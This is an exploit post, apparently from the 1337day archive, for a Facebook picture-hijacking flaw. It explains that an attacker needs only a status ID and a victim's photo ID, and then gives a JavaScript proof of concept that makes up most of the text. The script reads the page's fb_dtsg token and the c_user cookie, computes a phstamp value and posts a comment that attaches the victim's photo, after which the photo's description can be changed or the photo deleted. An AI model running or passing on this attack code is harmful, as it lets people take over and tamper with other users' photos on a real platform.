After Malicious user hijack the picture, malicious person can change picture description as well as delete the picture.
Let's get started! all you need are status ID and victim's uploaded picture for comment ID.
Once you have both, we can simply comment on any status with that uploaded picture iD with the help of little javascript or you can use tampa data (attached_photo_fbid) to post with comment picture ID.
-----Javascript Facebook Picture Hijack PoC---- var yourMessage = "check out my pic"; // your msg var photofbID = XXXXXXXXXX; // victim photo ID var statuslinkID = XXXXXXXXXX ; //status ID where to comment with hijack function generatePhstamp(b, g) { var f = b.length; numeric_csrf_value = ''; for (var c = 0; c < g.length; c++) { numeric_csrf_value += g.charCodeAt(c) } return '1' + numeric_csrf_value + f } var e = document.getElementsByName('fb_dtsg')[0].value, c = document.cookie.split('c_user=')[1].split(';')[0], h = "ft_ent_identifier="+statuslinkID+"&comment_text="+yourMessage +"&source=1&client_id=1371674471412:1000847939&attached_photo_fbid="+photofbID+"&rootid=u_ps_0_0_m&ft[tn]=[]&ft[qid]=5891294842807711448&ft[mf_story_key]:-2575904214724011317&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" + c + "&__a=1&__dyn=7n8aD5z5CF-&__req=1r&fb_dtsg=" + e; m = generatePhstamp(h, e); h += "&phstamp=" + m; picture = new XMLHttpRequest(); picture.open("POST", "https://www.facebook.com/ajax/ufi/add_comment.php", true); picture.setRequestHeader("Content-type", "application/x-javascript; charset=utf-8"); picture.send(h); console.log("The pic has been Hijacked & posted at http://facebook.com/"+statuslinkID); # C21C8F0A214D3F86 1337day.com [2013-06-22] 69C7CC3775144A2C #
Follow: http://1337day.com/exploit/20915